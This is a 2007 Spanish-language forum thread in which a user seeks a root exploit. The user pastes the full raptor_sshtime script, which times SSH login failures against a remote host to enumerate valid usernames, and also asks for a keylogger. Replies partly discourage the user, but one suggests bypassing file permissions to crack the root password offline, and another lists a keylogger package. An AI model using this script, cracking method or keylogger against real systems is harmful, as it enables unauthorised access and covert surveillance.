PDA

Ver la versión completa : overflow



CALONDOLO
10-06-2007, 16:35
k buenos dias,, necesito un favor
algun superduro que me envie el procedimiento detallado para explotar vulnerabilidad de algunos de los programas propios de linux, desbordando el buffer de la pila, para cambiar la direccion de retorno y ejecutar la shellcode para conseguir privilegios de root, pero desde linea de comandos , con commandos de perl..

milllll gracias

j8k6f4v9j
10-06-2007, 19:11
CALANDOLO, cualquier programa no es vulnerable como para conseguir un desbordamiento de búfer, sólo algunos programas en determinadas versiones.

Si lo que quieres es aprender puedes buscar avisos de seguridad y exploits antiguos y las versiones afectadas.

Normalmente el mismo exploit te dice cómo ha de ser ejecutado.

Salu2

Cypress
10-06-2007, 23:02
Una forma de conseguir el pass del root, es con windows.. bien facil, bajate algun programa que lea ext3 desde win(con un liveCD también se puede), esos no hacen caso a ningun permiso y se puede obtener con el John the Ripper el pass.

Se te complica a la hora de crackear el pass, imaginate si puso de pass "j8k6f4v9j" ufff nunca más lo vas a sacar xDD

Saludos,
Cypress

chico1988
10-06-2007, 23:43
si quieres aprender sobre este tema buffer overflow, tienes qui un manual espero que te sirva, a mi me parece muy interesnate:

http://www.acis.org.co/fileadmin/Base_de_Conocimiento/V_Jornada_de_Seguridad/buffer_overflow_sin_formato-20050615_0.pdf

j8k6f4v9j
11-06-2007, 14:26
imaginate si puso de pass "j8k6f4v9j" ufff nunca más lo vas a sacar xDD

Justo ésa es la esencia de mi nick

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

chico1988
11-06-2007, 15:00
la verdad es que podria ser una buena contraseña bastante dificil de adivinar. CHaoo

j8k6f4v9j
11-06-2007, 15:32
Sí. Una mejor:


pwgen -nc 50 1

O lo que es similiar:


cau8roo7pah6beaThiquaizieconahFooch2ohz7IeVopewei4

Y si añadimos símbolos y caracteres especiales la cosa se complica.

Pero advierto que el crackeo de contraseñas poco tiene que ver con el desbordamiento de búfer, y pot tanto, se sale del tema del hilo ;)

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

CALONDOLO
04-10-2007, 16:54
Holas,,, muy buenos dias,,,, quien me ayuda con este exploit que voy a compilar y me genera cualquier cantidad de errores,,,
quie me lo revisa y lo compila,,,
un millon de gracias,,


aqui lo pego

#!/bin/bash

#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi <[email protected]>
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears that this issue is dependent on the use of
# manually-set passwords that causes delays when processing /etc/shadow due to
# an increased number of rounds (CVE-2006-5229).
#
# This is a simple shell script based on expect meant to remotely analyze
# timing differences in sshd "Permission denied" replies. Depending on OpenSSH
# version and configuration, it may lead to disclosure of valid usernames.
#
# Usage example:
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#

# Some vars
port=22

# Command line
host=$1
dict=$2

# Local functions
function head() {
echo ""
echo "raptor_sshtime - [Open]SSH remote timing attack exploit"
echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>"
echo ""
}

function foot() {
echo ""
exit 0
}

function usage() {
head
echo "[make sure the target hostkey has been approved before]"
echo ""
echo "usage : ./sshtime <target> <wordlist>"
echo "example: ./sshtime 192.168.0.1 dict.txt"
foot
}

function notfound() {
head
echo "error : expect interpreter not found!"
foot
}

# Check if expect is there
expect=`which expect 2>/dev/null`
if [ $? -ne 0 ]; then
notfound
fi

# Input control
if [ -z "$2" ]; then
usage
fi

# Perform the bruteforce attack
head

for user in `cat $dict`
do
echo -ne "$user@$host\t\t"
(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
done

foot

CALONDOLO
04-10-2007, 16:59
ah,,, alguien que me regale un key logger bien bueno para linux centos

mi corre editado

este es el correo que uso para los foros ,, mi direccion seria es otra

j8k6f4v9j
04-10-2007, 21:37
¿No es eso un poco cómodo?

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

clarinetista
05-10-2007, 00:01
Joder "un poco"...........

j8k6f4v9j
05-10-2007, 04:59
Por cierto, es un script en bash, así que es más que normal que te dé errores al compilar xD

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

Cypress
05-10-2007, 05:55
como dice j8 ^ leyendo tu post estaba punto de escribir lo mismo, pero j8 se me adelanto xD

pero para que no te vuelva a pasar lo del compilador o interprete, la forma de darte cuenta, es saber en qué lenguaje está programado.

- bue.. lo ideal seria entender el exploit :p -

En tu caso, salta a la luz por esto:


#!/bin/bash

te está dando la ruta del interprete, bash.

Código en Perl Python o PHP son todos interpretados,

Aunque existe activeperl.. o algo así, que se puede compilar.

En el caso de C que es un lenguaje compilado, basta ver las librerias importadas
cuando en un código ves algo que empieza con:


#include <stdio.h>
o
#include <algo.h>

eso es C ^

y bue.. más o menos esos son los lenguajes que vas a encontrar donde están echos los exploits.

Saludos.

CALONDOLO
05-10-2007, 20:10
ok,, muchas gracias,, pero trato de ejecutarlo asi:
sh exploit.sh IP remota dict.txt y tambien saca errores,,, o
./sshtime IP remota dict.txt y tampoco
el dict.txt puede ser un diccionario cualquiera?,, por que deproto ese es el
problema


de antemano mil gracias,,,
ah y regalenme por fa un keylogger bueno para linux centos 4.1

RaidMan
05-10-2007, 20:47
ah y regalenme por fa un keylogger bueno para linux centos 4.1


Venga, te voy a ayudar con el KeyLogger: KeyLogger´s (www.google.es)

Te aseguro que los que hay en esta web van muy bien, ademas hay para linux y muchos para Win

Un saludo

j8k6f4v9j
06-10-2007, 00:40
ok,, muchas gracias,, pero trato de ejecutarlo asi:
sh exploit.sh IP remota dict.txt y tambien saca errores,,, o
./sshtime IP remota dict.txt y tampoco
el dict.txt puede ser un diccionario cualquiera?,, por que deproto ese es el
problema"errores" es algo impreciso. Algo como esto estaría mejor para depurar el problema:

./sshtime 192.168.1.55 dict.txt

ssh: connect to host 192.168.1.55 port 22: Connection refused



de antemano mil gracias,,,
ah y regalenme por fa un keylogger bueno para linux centos 4.1
Los keyloggers de fuentes abiertas ya se encargaron sus desarrolladores de regalártelos. Ahora te toca, como bien dice RaidMan, buscarlos.

lkm?

t:~$ apt-cache search keylogger
lkl - userspace keylogger for x86 architecture
Package: lkl
Priority: optional
Section: utils
Installed-Size: 124
Maintainer: Jean-Michel Kelbert <[email protected]>
Architecture: i386
Version: 0.1.1-1
Depends: libc6 (>= 2.3.2.ds1-21)
Filename: pool/main/l/lkl/lkl_0.1.1-1_i386.deb
Size: 10146
MD5sum: fed5f8c3a688287cfdc28a8e84237832
SHA1: 4f3e059d858918734c99c24ad18e12ca34e8d802
SHA256: b9885ee19fc35f9043eb8526c49b2c44fb6fa9d7c72fe97126 9d7e815f7e737b
Description: userspace keylogger for x86 architecture
LKL is a userspace keylogger that runs under Linux on the x86
architechture. LKL sniffs and logs everything that passes through the
hardware keyboard port (0x60). It translates keycodes to ASCII with a
keymap file.
Tag: hardware::input:keyboard, network::server, role::program



Salu2

Cypress
06-10-2007, 03:20
wooow no sabia que con apt podia buscar paquetes !! cada día me sorprendo más :) Gracias j8 :) :) :)

siento que me estoy perdiendo mucho de apt :(

Saludos.

j8k6f4v9j
12-10-2007, 23:26
apt busca en los repositorios incluídos en /etc/apt/sources.list. Pero también hace muchas otras cosas: mostrar descripciones, dependencias, versiones, etc.


man apt

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad: